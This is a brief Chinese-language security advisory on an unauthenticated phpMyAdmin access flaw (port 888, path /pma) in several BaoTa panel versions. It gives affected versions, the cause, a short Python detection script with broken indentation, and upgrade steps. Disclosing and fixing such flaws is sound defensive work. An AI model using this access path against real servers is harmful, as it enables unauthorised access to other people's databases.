宝塔后门-数据库未授权访问漏洞
影响版本
宝塔Linux版本 7.4.2版本
宝塔Linux测试版本 7.5.14版本
宝塔Windows版 6.8版本
漏洞描述
攻击者可以直接通过访问 http://网站IP:888/pma的方式。直接登录数据库后台管理页面。
宝塔是默认安装phpMyAdmin(数据库管理后台)并开启了888端口。而 phpMyAdmin 没有验证用户是否;拥有访问数据库的权限,就直接对用户放行所造成的漏洞。
漏洞原理
如果传入了username和password的情况下,宝塔会改写phpmyadmin的配置文件config.inc.php,将认证方式改成config,并写死账号密码。
poc
import requests
domain = 'url'
payload = ':888/pma'
url = domain+payload
response = requests.get(url)
if response.status_code == 200:
print("漏洞存在!")
else:
print("可能不存在")exploit
修复建议
升级到宝塔最新版
关闭888端口
离线升级步骤:
- 下载离线升级包:http://download.bt.cn/install/update/LinuxPanel-7.4.3.zip
- 将升级包上传到服务器中的/root目录
- 解压文件:unzip LinuxPanel-7.4.3.zip
- 切换到升级包目录:cd panel
- 执行升级脚本:bash update.sh
- 删除升级包:cd .. && rm -f LinuxPanel-7.4.3.zip && rm -rf panel